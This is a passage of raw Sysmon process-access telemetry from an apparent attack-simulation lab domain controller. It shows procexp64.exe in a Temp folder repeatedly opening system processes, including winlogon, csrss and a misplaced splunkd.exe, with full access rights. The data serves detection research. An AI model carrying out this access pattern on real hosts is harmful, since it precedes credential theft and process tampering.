Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 